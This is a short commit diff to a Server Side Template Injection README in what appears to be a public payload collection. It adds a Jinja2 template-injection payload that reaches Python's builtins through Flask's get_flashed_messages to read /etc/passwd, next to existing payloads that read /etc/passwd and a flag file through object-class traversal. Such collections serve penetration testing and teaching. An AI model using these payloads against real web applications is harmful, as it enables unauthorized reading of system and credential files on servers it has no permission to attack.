SSTI Payload in Jinja2 - Arbitrary file read

Server Side Template Injection/README.md

@@ -381,6 +381,8 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
+# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
+{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
 ```
 
 ### Jinja2 - Write into remote file